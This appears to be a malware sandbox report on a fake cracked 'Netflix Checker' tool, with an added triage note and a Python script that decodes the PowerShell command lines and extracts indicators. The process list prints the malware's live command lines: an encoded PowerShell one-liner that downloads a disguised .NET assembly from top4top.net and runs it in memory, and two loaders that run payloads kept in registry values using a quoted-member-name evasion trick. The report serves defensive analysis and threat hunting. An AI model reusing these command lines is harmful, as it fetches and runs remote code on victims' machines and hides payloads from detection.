"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\procs.exe"
C:\Users\Admin\AppData\Roaming\Checker Netflix.exe
"C:\Users\Admin\AppData\Roaming\Checker Netflix.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\l1l1l.vbs"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\powershell.js"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\r1r1.vbs"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAGIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8ANgAuAHQAbwBwADQAdABvAHAALgBuAGUAdAAvAHAAXwAxADMANQAyADkAdAA2AHIANwAxAC4AagBwAGcAJwApACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAbgB1AGwAbAApAA==
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit [Reflection.Assembly]::'Load'((Get-ItemProperty HKCU:\Software\tsQKDrCBEkat).evTHJP).'EntryPoint'.'Invoke'($Null,$Null)
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit [Reflection.Assembly]::'Load'((Get-ItemProperty HKCU:\Software\vLEwUGUT).gukeLLVoun).'EntryPoint'.'Invoke'($Null,$Null)
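Triage note on the three powershell.exe launches above (this is an added worked example for the page, not part of the sandbox output). PowerShell's -enc / -EncodedCommand argument is base64 over the UTF-16LE bytes of the script, so the first command line decodes to a one-liner that downloads a base64 text blob from https://6.top4top.net/p_13529t6r71.jpg (a .NET assembly disguised as an image; the Network table shows the matching TLS connection to 195.154.118.206:443), decodes it, loads it into the current AppDomain and calls its entry point, all without writing the payload to disk. The second and third instances load an assembly from a value under HKCU:\Software (tsQKDrCBEkat\evTHJP and vLEwUGUT\gukeLLVoun), i.e. the payload is being kept in the registry; the quoting of member names ('Load', 'EntryPoint', 'Invoke') is a string-as-member-name trick that breaks naive substring matches. The report does not show the contents of the remote file or of the registry values. The script below decodes and normalises the three command lines as copied from the process list and extracts the URL, the registry key/value pairs and a set of indicator flags; the indicator names, the simplified switch handling and the result layout are this example's own choices.

```python
"""Triage of the powershell.exe command lines from the process tree above.

Added example; not part of the sandbox report. REPORT_CMDLINES is copied from
the "Processes" list; indicator names and flag handling are this example's own.
"""
from __future__ import annotations

import base64
import re
from dataclasses import dataclass, field

# Copied verbatim from the process tree above (three powershell.exe launches).
REPORT_CMDLINES = [
    r""""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAGIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8ANgAuAHQAbwBwADQAdABvAHAALgBuAGUAdAAvAHAAXwAxADMANQAyADkAdAA2AHIANwAxAC4AagBwAGcAJwApACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAbgB1AGwAbAApAA==""",
    r""""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit [Reflection.Assembly]::'Load'((Get-ItemProperty HKCU:\Software\tsQKDrCBEkat).evTHJP).'EntryPoint'.'Invoke'($Null,$Null)""",
    r""""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit [Reflection.Assembly]::'Load'((Get-ItemProperty HKCU:\Software\vLEwUGUT).gukeLLVoun).'EntryPoint'.'Invoke'($Null,$Null)""",
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand, plus -e and -ec.
ENCODED_FLAGS = {"e", "ec"} | {"encodedcommand"[:n] for n in range(2, 15)}
# Switches that consume the next token (simplified; enough for this process tree).
VALUE_FLAGS = {"w", "windowstyle", "ep", "executionpolicy", "v", "version"}
COMMAND_FLAGS = {"c", "command"}

# Indicator names are this example's own labels, matched case-insensitively.
INDICATORS = {
    "assembly_load": r"(?:\[Reflection\.Assembly\]::Load|CurrentDomain\.Load)\(",
    "entrypoint_invoke": r"\.EntryPoint\.Invoke\(",
    "base64_decode": r"FromBase64String\(",
    "remote_download": r"\.Download(?:String|Data|File)\(",
    "registry_payload": r"Get-ItemProperty\s+HK(?:CU|LM|U|CR|CC):",
}
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)
REG_VALUE_RE = re.compile(r"\(Get-ItemProperty\s+(HK\w+:\\[^\s)]+)\)\.(\w+)", re.I)
# ::'Load' / .'Invoke' -> ::Load / .Invoke (quoted member names).
QUOTED_MEMBER_RE = re.compile(r"""(?<=[.:])(["'])([A-Za-z_]\w*)\1""")


@dataclass
class Triage:
    cmdline: str
    script: str                 # decoded and normalised script text
    was_encoded: bool
    indicators: list[str] = field(default_factory=list)
    urls: list[str] = field(default_factory=list)
    registry_values: list[tuple[str, str]] = field(default_factory=list)


def decode_encoded_command(blob: str) -> str:
    """-EncodedCommand carries base64 of the script's UTF-16LE bytes."""
    return base64.b64decode(blob.strip("'\""), validate=True).decode("utf-16-le")


def extract_script(cmdline: str) -> tuple[str, bool]:
    """Return (script text, was_encoded) for one powershell.exe command line."""
    tokens = cmdline.split()[1:]            # drop the executable path
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        if not tok.startswith(("-", "/")):
            break                           # first non-switch token starts the script
        name = tok.lstrip("-/").lower()
        if name in ENCODED_FLAGS and i + 1 < len(tokens):
            return decode_encoded_command(tokens[i + 1]), True
        if name in COMMAND_FLAGS:           # -c / -Command: the rest is the script
            i += 1
            break
        if name in VALUE_FLAGS:
            i += 2                          # switch plus its argument (-w 1)
        else:
            i += 1                          # bare switch (-noP, -sta, -noexit)
    return " ".join(tokens[i:]), False


def normalise(script: str) -> str:
    """Undo the quoted-member-name trick so signatures match the plain form."""
    return QUOTED_MEMBER_RE.sub(r"\2", script)


def triage_powershell(cmdline: str) -> Triage:
    raw, was_encoded = extract_script(cmdline)
    script = normalise(raw)
    hits = [name for name, pat in INDICATORS.items() if re.search(pat, script, re.I)]
    return Triage(cmdline=cmdline, script=script, was_encoded=was_encoded,
                  indicators=hits, urls=URL_RE.findall(script),
                  registry_values=REG_VALUE_RE.findall(script))


def triage_all(cmdlines=REPORT_CMDLINES) -> list[Triage]:
    return [triage_powershell(c) for c in cmdlines]


if __name__ == "__main__":
    for t in triage_all():
        print("encoded" if t.was_encoded else "plain", t.indicators)
        print("  script:", t.script)
        for url in t.urls:
            print("  url:", url)
        for key, value in t.registry_values:
            print("  registry payload:", key, "->", value)
```

Running it prints the decoded stage-one script, the top4top.net URL, and the two registry locations the later stages read the assembly from; those three artefacts plus the Startup .lnk files listed under "Drops startup file" are the items to hunt for on other hosts.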
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.125.24.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | papa.hopto.org | udp |
| US | 8.8.8.8:53 | 6.top4top.net | udp |
| FR | 195.154.118.206:443 | 6.top4top.net | tcp |
| US | 8.8.8.8:53 | 6.top4top.io | udp |
| FR | 195.154.118.206:443 | 6.top4top.io | tcp |
| US | 8.8.8.8:53 | 206.118.154.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.208.79.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 254.133.241.8.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Roaming\Checker Netflix.exe
| MD5 | 068068c3cefb4c8d997271897c3173bb |
| SHA1 | d2c22b2c05f2a5c953f9a8a728435b3ba2a9954e |
| SHA256 | 23d57dd5576d4a2841457ef578455fd1c61c21758a9b325469e57d0c5f88f7b5 |
| SHA512 | 0b8c7c29654505f085de12c7663edc326333a439df37d7f48e61019c885ed0810ba492046eac6b2ca4a2a6c75544ad7347cb54869015980fabd85deefc0e549a |
C:\Users\Admin\AppData\Roaming\l1l1l.vbs
| MD5 | c78f607c916f060d6ee3bf391e303acc |
| SHA1 | 1575998cda060d4a570ba258abc12044601da283 |
| SHA256 | f1e57d1714f74c6939ee24bb348fa12e925ec7eb380d5a7d0f1d230effb742f4 |
| SHA512 | cf26b8b381402622df420fa3881630661d08d76660d01be2d695af8ade568a6f5e3b365e4b17bffee5589d936eeaad3f7ebf413f4a2d810d976b66511548875b |
memory/1836-151-0x0000000000280000-0x0000000000400000-memory.dmp
C:\Users\Admin\AppData\Roaming\r1r1.vbs
| MD5 | 0494f414da149631c3d59861865dad37 |
| SHA1 | c9fd335759efb52e58acb974af27cdecb35d0f10 |
| SHA256 | a2effa9551b467c88ccea70024bd13650267752d1d6bcd91a5bd6915d9c47a56 |
| SHA512 | a86f2532f2ba996dc8421146d918250b1925daf803a470e3bce312f29a4d0b25af51d4abc005ab390650cb0cf6b4024df3c411e6ae4ed03cd51906b54683f333 |
C:\Users\Admin\AppData\Roaming\powershell.js
| MD5 | 40b65baa1541784dd92f5aa8ae11b0ef |
| SHA1 | 0772c95f56a025704c01389f2d1108a17fb987cf |
| SHA256 | 9609d3a8ee7d439c54aca9c5aeced07caa4199f116367ecb88b63e9e2e29a699 |
| SHA512 | fc784babe03c75559314dc15a04386d528e71b003b40349df2a4845576bbc9d2f0898d27fc5b1be8cda9fbf16715822bf0616fa7835e1abefe7ccacc8da3b3d2 |
memory/1836-157-0x0000000004D90000-0x0000000004DA0000-memory.dmp
memory/1836-158-0x00000000074E0000-0x000000000757C000-memory.dmp
memory/1836-159-0x0000000007B30000-0x00000000080D4000-memory.dmp
memory/1836-160-0x0000000007580000-0x0000000007612000-memory.dmp
memory/4692-163-0x0000000003160000-0x0000000003196000-memory.dmp
memory/4692-164-0x0000000005D80000-0x00000000063A8000-memory.dmp
memory/1836-165-0x00000000074D0000-0x00000000074DA000-memory.dmp
memory/1836-166-0x00000000080E0000-0x0000000008136000-memory.dmp
memory/4692-168-0x0000000005740000-0x0000000005750000-memory.dmp
memory/4692-172-0x0000000005B40000-0x0000000005B62000-memory.dmp
memory/4692-184-0x0000000006520000-0x0000000006586000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wa1vl5qb.isl.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4692-173-0x0000000005C60000-0x0000000005CC6000-memory.dmp
memory/4692-171-0x0000000005740000-0x0000000005750000-memory.dmp
memory/4692-185-0x0000000006990000-0x00000000069AE000-memory.dmp
memory/4524-205-0x0000000002490000-0x00000000024A0000-memory.dmp
memory/3748-206-0x0000000002B00000-0x0000000002B10000-memory.dmp
memory/4524-203-0x0000000002490000-0x00000000024A0000-memory.dmp
memory/3748-207-0x0000000002B00000-0x0000000002B10000-memory.dmp
memory/1836-208-0x0000000004D90000-0x0000000004DA0000-memory.dmp
memory/4692-209-0x0000000005740000-0x0000000005750000-memory.dmp
memory/3748-210-0x0000000006940000-0x0000000006984000-memory.dmp
memory/4692-211-0x00000000081B0000-0x000000000882A000-memory.dmp
memory/4692-212-0x0000000006E00000-0x0000000006E1A000-memory.dmp
memory/3748-213-0x0000000007780000-0x0000000007816000-memory.dmp
memory/3748-215-0x0000000002B00000-0x0000000002B10000-memory.dmp
memory/4524-214-0x0000000006CE0000-0x0000000006D02000-memory.dmp
memory/4524-216-0x0000000002490000-0x00000000024A0000-memory.dmp
memory/4524-217-0x0000000007160000-0x00000000071D6000-memory.dmp
memory/1836-220-0x0000000004D90000-0x0000000004DA0000-memory.dmp
memory/4524-221-0x0000000002490000-0x00000000024A0000-memory.dmp
memory/4524-222-0x0000000002490000-0x00000000024A0000-memory.dmp
memory/3748-223-0x0000000002B00000-0x0000000002B10000-memory.dmp
memory/1836-224-0x0000000004D90000-0x0000000004DA0000-memory.dmp
memory/3748-225-0x0000000002B00000-0x0000000002B10000-memory.dmp
memory/4524-226-0x0000000002490000-0x00000000024A0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | eec69f1a7eff9b5f29366da620e7de88 |
| SHA1 | be3b8ae89646aa781dfeb338ecf1b10a8c0c6060 |
| SHA256 | ffc642634c4337f759852084b94b5bbbb247285d16408d4bec65f240004af5c2 |
| SHA512 | 70d7184fdd97388eb5eeeab2fb716e96a1a4d3a4339e83e98a9b2ca3621c19d379936a108b49d11da971cc428683835f44fc21c59ffb014e3fb5f19c07aa5061 |